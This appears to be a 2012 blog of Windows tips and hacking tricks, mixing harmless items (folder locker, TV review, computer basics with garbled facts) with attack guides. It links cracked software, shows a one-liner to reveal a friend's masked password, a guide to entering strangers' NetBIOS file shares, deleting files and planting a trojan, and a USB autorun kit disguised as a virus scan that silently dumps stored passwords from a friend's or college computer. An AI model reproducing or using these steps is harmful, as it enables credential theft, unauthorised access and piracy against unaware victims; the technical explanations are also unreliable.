31 July 2012

CRACK PASSWORD PROTECTED FILE OF ANY TYPE

SOLUTION:-
Hey everyone.
Do you know you can crack any file's password of any extension.
How to crack password? Here is a simple solution:-
You need a software called as Passware password kit enterprise.
To download click here.
Click on the about link because it is not free software but if you download the software from link provided above you will get it free as it is cracked.
Install it.
Follow the onscreen instruction.It is very easy to use and fast to retrieve password.
Now Don't need to worry at all if you've downloaded any password protected file mistakenly.

thank you :)

ANOTHER WAY TO EARN MOENY BY UPLOADING FILES FOR INDIA ALSO

SOLUTION:-
Hello everyone.Everyone at certain age worry about money and think how they can make money through internet.
So here are some websites that help you to generate more money:
  • HotFile:-Hotfile pays very low and it is totally pay per performance sort of thing.You will start with copper account in which you will get lowest payments.With increasing downloads they will increase your payment per 1000 download.
Main Features:-

1. As a free uploader you can earn upto $12 per 1000 downloads.
2. Your payment rate is based upon performance.
3. They accept download from following countries:-United States, Canada, Norway, Finland, Sweden, United Kingdom, Germany, Latvia, Estonia, France, Spain, Portugal, Italy, Austria, Switzerland, Hungary, Czech Republic, Netherlands, Belgium, Greece, Denmark, Ireland, Poland, Slovakia, Slovenia, Lithuania, Bulgaria, Romania, Australia, Russia, Liechtenstein, Kuwait, Qatar, United Arab Emirates, Saudi Arabia and Bahrain.
4. Earn 20% of your referral income.
5. Minimum payout $15.
6. Payment via Paypal,webMoney,Epasspote every Monday.
7. Automatic payouts no intervention required.
8. Upload speed average.

  • Depositfiles.com:-This earn from file sharing program pays on the basis of size of downloaded file and the location.They mainly pay for the US and Russian traffic which is a mandatory condition.Although they have mentioned that they also pay for EU traffic but the rate are not clearly understandable by me ,you better check out the rates.
Main Features:-

1. You will be paid for only US,EU and Russian traffic.
2. Payment is truly based on the size of download,more size = more money.
3. Earn 20% of your referrals.
4. Minimum Payout $10 for active users.
5. If you are an Indian then they pay $2 for every 1000 download its good.I only got when I registered into their site.
6. Participate in bonus program and earn bigger amounts.
7. Payment Via Paypal automatically once you reached $10.
8. Upload speed Average.


  • FileFactory.com:-FileFactory is a bit different than Uploading.com and Ziddu.com and for sure not better than both.FileFactory pays on the basis of countries from which download comes.The countries are divided in tiers according to which payment is made.
Main Features:-

1. Earn upto $10 per 1000 US download.This is the standard rate for US download by most of Sites.
2. Free premium membership Rewards.
3. Get 10% of your referrals.
4. Various rewards you can win up to X BOX 360.
5. Toughest condition that downloads smaller than 20 Mb do not qualify for payment.a bit harsh they are.
6. To receive cash you have to be a premium member.
7. Only PayPal payments.
8. View their tier distribution
9. Upload speed not very fast.

  • Uploading.com:-Uploading.com pays serious cash if you have a good quality US,EU and RU traffic.It is operating from few years and they have paid many uploaders.The main features are:-
Main Features:-
1. $10 per 1000 downloads of US and EU countries.
2. $5 per RU downloads.
3. no price for other countries.
4. Earn 10% of your referrals.
5. Daily payment processing.
6. Payment through Paypal,Epese, Epassporte, Wire Transfer,WebMoney
7. Great uploading speed.

  • Ziddu.com:- Very nice because no size and country limitation.Since most traffic is India this is best for Indians .Suggested to all those who have traffic but not of US and UK.Main features of Ziddu.com earning programme are listed below:-
Main Features:-
1. Its free to join,anybody can join Ziddu.com.
2. For each Unique Download You will get .001$.It is much more if your main traffic is outside US.
3.You will get $0.10 Referral Bonus, when someone joins with Ziddu through your referral link.
4. Payment Via Paypal or MoneyBookers on net 40 basis.
5. Very fast uploading speed.
6. Upto 10 files can be uploaded at once.

Thank you :)

29 July 2012

GET QUICK HEAL TOTAL SECURITY FREE

SOLUTION:-
First download the quick heal total security.to download click here.
Next download quick heal crack by clicking here.

  • After download completes.Run the quick heal setup and let the program download the file and install it.
  • After that restart you computer in safe mood by pressing F8 rapidly.
  • Copy all files included in crack folder and past it in quick heal directory.When ask to replace file,say yes and let it replace the files.
  • Open the quick heal total security and go to File and folder section.
  • Select exclude files and folder.
  • Click on Add button.
  • Next add the quick heal folder and subfolder to the exclusion list.
  • Click on save button and restart your computer in normal mood.
That's it.all done.
Enjoy the total security for 1 years.

thank you :)

27 July 2012

KNOW YOUR FRIEND"S PASSWORD

SOLUTION:-
Now anyone can see password if it is hidden by Asterisk ****

To do so follow the instruction below.
  • 1) Open the Login Page of any website.
  • 2) Type your 'Username' and 'Password'.
  • 3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.
javascript: alert(document.getElementById('Passwd').value);
  • As soon as you press 'Enter', A window pops up showing Password type.
NOTE:- this trick may not work with firefox.

thank you :)

KICK SOMEONE FROM WIRELESS NETWORK

SOLUTION:-
  • Open cmd.
  • Write shutdown -i.
  • Choose a Victim from the list.
  • Choose to shutdown their computer.
  • Make the warning pop up 1 sec before shutting down.
  • Click Ok.
All done.
thank you :)

KICK EVERYONE FROM COUNTER STRIKE SERVER

SOLUTION:-
To all counter strike fans here's a short solution to kick everyone out of counter strike server.
  • Place Buffer1.cfg and Buffer2.cfg in your cfg folder. If it doesn't exist, make it
Commonly C:\User\program files\steam\steamapps\Account name\counter-strike
source\cstrike\cfg)
  • Go in game, open the developer's console, and type in the following you may change
bind key:
Bind M "wait;exec Buffer1;exec Buffer2"
  • If developer's console doesn't open, go to options, keyboard, advanced, enable developer's console.
  • Go in game and rapidly hit the M key to crash the server. Depending on how fast you hit it, it should take anywhere from 15-30 seconds to crash.
  • Don't stop hitting the key until you get a message:"Client # has overflowed reliable channel."
Thats it.enjoy.
thank you :)

22 July 2012

COMPUTER PARTS AND WORKING

ANSWER:-

What are computer parts?
Here's the answer.
Computer content of many parts.That is input and output parts.
The input parts are Keyboard,mouse,scanner,DVD writter.
The output parts are Monitor,speaker,printer etc.

But there are some parts that work both as input as well as output source that is Hard drive,flash drive,DVDs/CDs.

Hard drive can take Data (input) so as to store and also it provides data (output)so as to proceed.
Pen-drive does the same work as hard drive do it provides data (output) to the computer to proceed and also stores the data (input).

There is also processing units known as Computer CPU.
The CPU works in two ways,it take the input sent by the input device and gives the output to the output device.
In between CPU,Output device,and input device there is and temporary media known as RAM which stands for or is a short form of Random access memory.
It stores data temporarily.
The motherboard is the part which Connects All part to make a computer run.on motherboard there are CPU,hard drive,RAM,DVD writer,PSU or SMPS,Graphic card,Tv tunner card,Audio card,also Keyboard,mouse,speaker,Headphones are attached to it.

The computer parts are:- 
Keyboard,mouse,Hard drive,optical drive known as DVDs/CDs,flash drive,Cabinet in which all parts are assembled,CPU also called as brain of computer,printer,scanner,DVD writer,RAM (Random access memory),Also a modem or router,TV tunner card,Graphic card,Audio card,PSU or SMPS(It is a power supply unit),Motherboard.

Also there are Software uses for some special task.
So the question is how this works?
So here's another answer.

First the User uses input device to give command to the computer.
The word from the keyboard is first get stored into the RAM, then it proceed to the CPU were this temporary data from RAM gets stored in Cached memory, then this data from cache goes to CPU where the CPU categorizes the type of data. The CPU works in 2 ways that is ALU which is a shot form of Arithmetic logic unit.
The arithmetic is used for mathematical problems, numbers.
And the logic unit is used for language, grammatical, letters, etc purpose
After the CPU categorizes this input, the CPU solves/understand  the problem and give back to RAM from there the processed data get into output device.
The CPU or computer does not understands the simple languages like alphabets or like numbers, the computer first use to convert it into binary coding that contains only 1 or 0 as a processing codes.
If user wants to take his/her data on a DVD/CD disk then he needs to use a DVD writer. Which write on a CD/DVD using leaser.
Although it is not simple to study about computer as there are infinite problems occurring day by day but its better to understand the basics.
Please remember to protect your computer from viruses.

thank you :)

SHORT REVIEW ABPUT SONY BRAVIA KDL46HX850

ANSWER:-

Highlights:-
The clearest video quality.
Slim design, stunning picture.
Beyond cable entertainment
3D ready with best video quality.
Can be used as monitor for pc.
Better gaming experience.
Tough, beautiful look.

My experience:-
I'm using this Product from last year. as I’m professional gamer, this product provides me better, best gaming experience without any problem.
Looks too slim, beautiful, powerful, high definition sound, high video quality, can be hanged on wall to watch calmly.
Entering the world of Sony bravia LED Screen, fully H1080p LED internet TV. The slim glass let you enjoy an durable, lightweight TV give the best experience in the world of television. With better brightness, contrast.
works best when surf internet, good for children’s. sleep mood enabled to save power. lesser power consumption of about 119 watts. Bigger screen to watch television like watching in movie theater. Diagonal dimension is about 117 CMs. with HDMI. weight 44.8lbs,height 27.4 inches, depth 10.6 inches, width 42.4 inches. Dell part is included in this LED TV for better performance. resolution is about 1920*1080 fully HD.

The Bravia KDL46HX850 comes with additional features like Clock, autopower off,3.2 compensation. Picture frame mode, photo MAP, startup Sony logo displayed, wi-fi enabled, 4x high speed 3D panel.etc.
With 2 USB ports.
supported picture- JPG
supported audio formats- MP3,WMA,LPCM
supported video formats- MPEG-1,MPEG-2,MPEG-4,WMV,AVCHD,TS,PS.
Comes with One year warranty.

thank you :)

SHORT INTRODUCTION ABOUT DotNetNuke

ANSWER:-
Introduction:-


DotNetNuke is an open web CPM (content management system).
It is based on and work using Microsoft .NET framework principal. It give shares of both community edition that is MIT license and CP (commercial proprietary) license .
The DotNetNuke CPM (content management system)it allow the management of website without specific  technical language. And extensible through large numbers of 3rd party applications to provide functionality.
The it is an open source project and this open source of DotNetNuke is known as community edition and also available for free download.
The DotNetNuke consist of two commercial editions of programs, this two programs increases the functionality of DotNetNuke.

Working or Architecture of DotNetNuke:-
The DotNetNuke has three tier architecture. Which includes core framework. This core framework provides extensible module structure. The DotNetNuke can be increases or extended using third party module which result in increase in functionality.
To change the visual of any site it can be change using skins.
The DotNetNuke provide great functionality like security, content management etc. core DotNetNuke also includes primary modules. All this modules, program provides great functionality for intranet, e-commerce system, and website or web application. Volunteer team community is responsible for maintaining the DotNetNuke.

Skin architecture of DotNetNuke:-
Skin provides separation between content and design, and enable the web designer to make/develop skin without any problem. It kept the skinning engine, which is stored using argument to assemble main pages or master page, also a web maker or a web programmer need to access the Microsoft visual studio.
Master pages are nothing but a simple text file, this can be made by any text editor. Skins include some HTML file and placeholders. Like pictures, skins can be developed, upload, and installed through administration page. The skin also need to content ASP.NET,if ASP.NET is not included, then the DotNetNuke will build one for it.

Thank you :)

15 July 2012

HACK USING IP ADDRESS

SOLUTION:-
Introduction:-
1. Welcome to the basic NETBIOS document created by aCId_rAIn. This document
will teach you some simple things about NETBIOS, what it does, how to use it, how to
hack with it, and some other simple DOS commands that will be useful to you in the
future.
1. Hardware and Firmware:-
  • The BIOS:-
The BIOS, short for Basic Input/Output Services, is the control program of the PC.
It is responsible for starting up your computer, transferring control of the system to
your operating system, and for handling other low-level functions, such as disk access.
NOTE that the BIOS is not a software program, insofar as it is not purged from
memory when you turn off the computer. It's
firmware, which is basically software on a chip.
A convenient little feature that most BIOS manufacturers include is a startup
password. This prevents access to the system until you enter the correct password.
If you can get access to the system after the password has been entered, then there
are numerous software-based BIOS password extractors available from your local
H/P/A/V site.
  • NETBIOS/NBTSTAT:-
NETBIOS, also known as NBTSTAT is a program run on the Windows system and is
used for identifying a remote network or computer for file sharing enabled. We can
expoit systems using this method. It may be old but on home pc's sometimes it still
works great. You can use it on your friend at home or something. I don't care what
you do, but remember, that you are reading this document because you want to learn.
So I am going to teach you. Ok. So, you ask, "How do i get to NBTSTAT?" Well, there
are two ways, but one's faster.
Method 1:Start>Programs>MSDOS PROMPT>Type NBTSTAT
Method 2:Start>Run>Type Command>Type NBTSTAT
(Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.)
Ok! Now since you're in the DOS command under NBTSTAT, you're probably
wondering what all that crap is that's on your screen. These are the commands you
may use.
Your screen should look like the following:
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer
NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts
Refresh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds between each display.
Press Ctrl+C to stop redisplaying
statistics.
C:\WINDOWS\DESKTOP>
The only two commands that are going to be used and here they are:
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
  • Host Names:- 
Now, the -a means that you will type in the HOST NAME of the person's computer
that you are trying to access. Just in case you don't have any idea what a Host Name
looks like here's an example.
123-fgh-ppp.internet.com
there are many variations of these adresses. For each different address you see
there is a new ISP assigned to that computer. look at the difference.
abc-123.internet.com
ghj-789.newnet.com
these are differnet host names as you can see, and, by identifying the last couple
words you will be able to tell that these are two computers on two different ISPs.
Now, here are two host names on the same ISP but a different located server.
123-fgh-ppp.internet.com
567-cde-ppp.internet.com
  • IP Addresses:-
You can resolce these host names if you want to the IP address (Internet Protocol)
IP addresses range in different numbers. An IP looks like this:
201.123.101.123
Most times you can tell if a computer is running on a cable connection because of the
IP address's numbers. On faster connections, usually the first two numbers are low.
here's a cable connection IP.
24.18.18.10
on dialup connections IP's are higher, like this:
208.148.255.255
notice the 208 is higher than the 24 which is the cable connection.
REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS.
Some companies make IP addresses like this to fool the hacker into believing it's a
dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway This
gives you an idea on IP addresses which you will be using on the nbtstat command.
  • Getting The IP Through DC (Direct Connection):-
You're going to need to find his IP or host name. Either will work. If you are
on mIRC You can get it by typing /whois (nick) ...where (nick) is the persons nickname
without parenthesis. you will either get a host name or an IP. copy it down. If you do
not get it or you are not using mIRC then you must direct connect to their computer
or you may use a sniffer to figure out his IP or host name. It's actually better to do
it without the sniffer because most sniffers do not work now-a-days. So you want to
establish a direct connection to their computer. OK, what is a direct connection?
When you are:
Sending a file to their computer you are directly connected.
AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted.
ICQ when sending a file or a chat request acception allows a direct connection.
Any time you are sending a file. You are directly connected. (Assuming you know the
user is not using a proxy server.)
Voice Chatting on Yahoo establishes a direct connection.
If you have none of these programs, either i suggest you get one, get a sniffer, or
read this next statement.
If you have any way of sending thema link to your site that enables site traffic
statistics, and you can log in, send a link to your site, then check the stats and get
the IP of the last visitor. It's a simple and easy method i use. It even fool some
smarter hackers, because it catches them off guard. Anyway, once you are directly
connected use either of the two methods i showed you earlier and get into DOS. Type
NETSTAT -n. NETSTAT is a program that's name is short for NET STATISTICS. It
will show you all computers connected to yours. (This is also helpful if you think you
are being hacked by a trojan horse and is on a port that you know such as Sub Seven:
27374.)
Your screen should look like this showing the connections to your computer:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 205.188.8.7:26778 ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
The first line indicated the Protocol (language) that is being used by the two
computers.
TCP (Transfer Control Protocol) is being used in this and is most widely used.
Local address shows your IP address, or the IP address of the system you on.
Foreign address shows the address of the computer connected to yours.
State tells you what kind of connection is being made ESTABLISHED - means it will
stay connected to you as long as you are on the program or as long as the computer is
allowing or is needing the other computers connection to it. CLOSE_WAIT means the
connection closes at times and waits until it is needed or you resume connection to be
made again. One that isn't on the list is TIME_WAIT which means it is timed. Most
Ads that run on AOL are using TIME_WAIT states.
the way you know the person is directly connected to your computer is because of
this:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 abc-123-ppp.webnet.com ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
Notice the host name is included in the fourth line instead of the IP address on all.
This is almost ALWAYS, the other computer that is connected to you. So here, now,
you have the host name:
abc-123-ppp.webnet.com
If the host name is not listed and the IP is then it NO PROBLEM because either one
works exactly the same. I am using abc-123-ppp.webnet.com host name as an example.
Ok so now you have the IP and/or host name of the remote system you want to
connect to. Time to hack!
Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's
the crap again. Well, now time to try out what you have leanred from this document
by testing it on the IP and/or host name of the remote system. Here's the only thing
you'll need to know.
IMPORTANT, READ NOW!!!
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
Remember this?
Time to use it.
-a will be the host name
-A will be the IP
How do i know this?
Read the Statements following the -a -A commands. It tells you there what each
command takes.
So have you found which one you have to use?
GOOD!
Time to start.
  • Using it to your advantage:-
Type this if you have the host name only.
NBTSTAT -a (In here put in hostname without parenthesis)
Type this is you have the IP address only.
NBTSTAT -A (In here put in IP address without parenthesis)
Now, hit enter and wait. Now Either one of two things came up
1. Host not found
2. Something that looks like this:
--------------------------------------------
NetBIOS Local Name Table
Name Type Status
---------------------------------------------
GMVPS01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
GMVPS01 <03> UNIQUE Registered
GMVPS01 <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
---------------------------------------------
If the computer responded "Host not found" Then either one of two things are the
case:
1. You screwed up the host name.
2. The host is not hackable.
If number one is the case you're in great luck. If two, This system isn't hackable
using the NBTSTAT command. So try another system.
If you got the table as above to come up, look at it carefully as i describe to you each
part and its purpose.
Name - states the share name of that certain part of the computer
<00>, <03>, <20>, <1E> - Are the Hexidecimal codes giving you the services available on
that share name.
Type - Is self-explanatory. It's either turned on, or activated by you, or always on.
Status - Simply states that the share name is working and is activated.
Look above and look for the following line:
GMVPS01 <20> UNIQUE Registered
See it?
GOOD! Now this is important so listen up. The Hexidecimanl code of <20> means that
file sharing is enabled on the share name that is on that line with the hex number. So
that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's
How to do it. (This is the hard part)
  • LMHOST File:-
There is a file in all Windows systems called LMHOST.sam. We need to simply add
the IP into the LMHOST file because LMHOST basically acts as a network,
automatically logging you on to it. So go to Start, Find, FIles or Folders. Type in
LMHOST and hit enter. when it comes up open it using a text program such as
wordpad, but make sure you do not leave the checkmark to "always open files with
this extension" on that. Simply go through the LMHOST file until you see the part:
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmans
erver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
Read this over and over until you understand the way you want your connection to be
set. Here's an example of how to add an IP the way I would do it:
#PRE #DOM:255.102.255.102 #INCLUDE
Pre will preload the connection as soon as you log on to the net. DOM is the domain or
IP address of the host you are connecting to. INCLUDE will automaticall set you to
that file path. In this case as soon as I log on to the net I will get access to
255.102.255.102 on the C:/ drive. The only problem with this is that by doin the
NETSTAT command while you are connected, and get the IP of your machine. That's
why it only works on simple PC machines. Because people in these days are computer
illiterate and have no idea of what these commands can do. They have no idea what
NETSTAT is, so you can use that to your advantage. Most PC systems are kind of
hard to hack using this method now because they are more secure and can tell when
another system is trying to gain access. Also, besure that you (somehow) know
whether they are running a firewall or not because it will block the connection to
their computer. Most home systems aren't running a firewall, and to make it better,
they don't know how operate the firewall, therefore, leaving the hole in the system.
To help you out some, it would be a great idea to pick up on some programming
languages to show you how the computer reads information and learn some things on
TCP/IP (Transfer Control Protocol/Internet Protocol) If you want to find out
whether they are running a firewall, simply hop on a Proxy and do a port scan on their
IP. You will notice if they are running a firewall because most ports are closed. Either
way, you still have a better chance of hacking a home system than hacking Microsoft.
  • Gaining Access:-
Once you have added this to you LMHOST file. You are basically done. All you need
to do is go to:
Start
Find
Computer
Once you get there you simply type the IP address or the host name of the system.
When it comes up, simply double click it, and boom! There's a GUI for you so you
don't have to use DOS anymore. You can use DOS to do it, but it's more simple and
fun this way, so that's the only way i put it. When you open the system you can edit,
delete, rename, do anything to any file you wish. I would also delete the command file
in C:/ because they may use it if they think someone is in their computer. Or simply
delete the shortcut to it. Then here's when the programming comes in handy. Instead
of using the NBTSTAT method all the time, you can then program you own trojan on
your OWN port number and upload it to the system. Then you will have easier access
and you will also have a better GUI, with more features. DO NOT allow more than one
connection to the system unless they are on a faster connection. If you are
downloading something from their computer and they don't know it and their
connection is being slow, they may check their NETSTAT to see what is connected,
which will show your IP and make them suspicious. Thats it. All there is to it. Now go
out and scan a network or something and find a computer with port 21 or something
open.


NOTE:- Its not easy to understand it.be careful.

thank you :)

13 July 2012

LOCK FOLDER WITHOUT SOFTWARE

SOLUTION:-
  • Open the Notepad file.
  • Copy the code and paste in the file.
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
  • Save the file as Locker.bat.
  • Then open the Locker.bat file by double clicking on it.
  • It will create a folder at the same location.
  • Copy all the files you want to protect from other.
  • To access the Locked folder simply Double click on the .bat file and enter the password which you have entered and it will unlock the folder.
NOTE:- Don't forget the .bat extension.This trick will not work for windows 8 may be for windows 7.

thank you :)

12 July 2012

DIABLE KEYBOARD TO SAVE COMPUTER FROM KIDS

SOLUTION:-
You'll need a keyboard locker software known as Kid-key-lock.
FEATURES:-
  • Very simple to setup and run
  • Seats on tray for easy access
  • Mouse Lock options:- 
Left mouse button,Middle mouse button,Right mouse button,Double click,Mouse wheel.
 
  •  Keyboard lock options:- Standard character keys i.e letters, numbers, signs, etc,Additional keys (Navigation keys, function keys, ins/del, home/end, etc),Windows system shortcuts(e.g. alt-tab, win-key, etc).
Install and run,automatically you'll follow the onscreen instruction.

thank you :)

HIDE FILE IN PICTURES

SOLUTION:-
You need .RAR compressor.
Her's how:-
  • Save the picture of choice to your desktop.
  • Make a new .rar or .zip folder on your desktop.
  • Add the files you want to hide into the .zip or .rar.
  • Click start menu, run, cmd.
  • In Command Prompt type cd "desktop" with the quotation marks.
  • Now type in copy /b picture name.jpg + Foldername.rar outputfilename.jpg OR If you use .zip then type in copy /b picturename.jpg + foldername.zip outputfilename.jpg
  • Now there should be the outputed file name with a .jpg extension on the desktop.
  • Do not close Command Prompt just yet

  • Double click it to open the picture and check it out.

  • When your done looking, and want to view the hidden files.Type: ren outputfilename.jpg outputfilename.rar or zip
 thank you :)

11 July 2012

HACK PASSWORD USING PENDRIVE

SOLUTION:-
As we all know, Windows stores most of the passwords which are used on a daily
basis, including instant messenger passwords.Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passwords from their stored places.
Using these tools and an USB pen-drive you can create your own rootkit to hack
passwords from your friend’s/college Computer.

Just download the listed programs:-

MessenPass:-
Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView:-
Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview:-

IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0.

Protected Storage PassView:- 
Recovers all passwords stored inside the Protected
Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox:-
PasswordFox is a small password recovery tool that allows you to view
the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename.

Here's the step how to make pendrive to hack password:-

  • Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.i.e Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
  • Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

  • Save the Notepad and rename it autorun.inf
  • Now copy the autorun.inf file onto your USB pendrive.
  • Create another Notepad and write the following code onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

  • Save the Notepad and rename it from
  • New Text Document.txt to launch.bat.
  • Copy the launch.bat file also to your USB drive.
  • Now your rootkit is ready and you are all set to hack the passwords.
To use this pen drive Just follow these steps:-
  • Insert the pen drive and the autorun window will pop-up. This is because, we have created an autorun pen drive.
  • In the pop-up window, select the first option Perform a Virus Scan.
  • Now all the password hacking tools will silently get executed in the background.The passwords get stored in the .TXT files.
  • Remove the pen drive and you’ll see the stored passwords in the .TXT files.
NOTE:- Before following any step please disable your antivirus program.This procedure will only recover the stored passwords (if any) on the Computer.This work on windows XP,vista,7,8.

thank you :)

10 July 2012

CLOSE PORT TO STOP SOME WINDOWS SERVICES

SOLUTION:-
Sometimes there are some programs that uses ports to get run properly.and also they uses memory,internet speed.so here's a simply tricks with which you can close the port to save unusual running of programs and save a bit memory.
  • Simply go to START -> RUN -> and type this in the box 
netsh firewall delete portopening TCP portnumber
and it'll close it for you.

OR

  • You can also open up command prompt START -> RUN -> CMD and type in netsh to get to your windows firewall settings.

  • vbs script for you so that it's automatically runnable. as well as a batch script. so here's the script.
.VBS Script:-

set ss = createobject("wscript.shell")
set ws = wscript
dim PORT
PORT = InputBox("Enter the port you wish to close:")
ss.run "netsh.exe"
ws.sleep 1000
ss.sendkeys "firewall delete portopening TCP " & PORT
ss.sendkeys "{enter}"
ws.sleep 500
'ss.sendkeys "exit"
'ss.sendkeys "{enter}"

.BAT Script:-

@echo off
title Port Closer
echo Port Closer
echo.
set /p port=Type the port number you wish to close here:
netsh firewall delete portopening TCP %port%
msg /w * Port %port% has been closed.
exit

NOTE:- To create any script simply open notepad and past the script in it and while saving the notepad file save it as .vbs or .bat.remember the extension.

thank you :)

CHAT USING COMMAND PROMPT

SOLUTION:-
Now you can chat using CMD with your friend.This trick will be useful when social networking software not works correctly.
So lets start.

  • All you need is your friend's IP Address and your Command Prompt.
  • Open Notepad and write this code as it is:-
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

  • Now save this as "Messenger.bat".
  • Open Command Prompt.
  • Drag this file Messenger.bat file over to Command Prompt and press Enter.
  • In the command prompt there only written "MESSENGER and User:"
  • Now type the computer's IP address of your friend you want to chat with.
  • Hit Enter and start chatting.
NOTE:- Getting an IP address is not so easy as many things can be done using friends IP address.

thank you :)

CHANGE FOLDER BACKGROUND

SOLUTION:-
  • Open the Folder in which you want to put the background.
  • Open up Notepad, then simply paste in this code:
 [{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=***Picture Location Here***\***Name of File***

  • Go to the picture you want to use and right click and select properties and get the file location by copying the location.
  • Now go back to your text document and where it says ***Picture Location Here*** paste the location you copied in the previous step.
  • Now after you've done that where it says ***Name of File*** type the name of the file including the .jpg .bmp .bip. jpeg etc
